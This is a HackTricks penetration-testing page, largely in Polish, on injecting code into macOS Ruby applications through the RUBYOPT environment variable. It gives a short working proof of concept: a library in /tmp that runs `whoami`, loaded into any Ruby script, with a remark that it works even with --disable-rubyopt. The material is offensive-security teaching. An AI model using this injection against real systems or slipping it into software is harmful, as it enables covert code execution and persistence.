macOS Ruby Applications Injection

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

RUBYOPT

Używając tej zmiennej środowiskowej, można dodać nowe parametry do ruby za każdym razem, gdy jest uruchamiane. Chociaż parametr -e nie może być użyty do określenia kodu ruby do wykonania, możliwe jest użycie parametrów -I i -r do dodania nowego folderu do ścieżki ładowania bibliotek, a następnie określenie biblioteki do załadowania.

Utwórz bibliotekę inject.rb w /tmp:

inject.rb

puts `whoami`

Utwórz gdziekolwiek skrypt ruby, taki jak:

hello.rb

puts 'Hello, World!'

Następnie spraw, aby dowolny skrypt ruby załadował go za pomocą:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Fajny fakt, działa nawet z parametrem --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie dla HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.

PreviousmacOS Python Applications Injection NextmacOS .Net Applications Injection

Last updated 4 months ago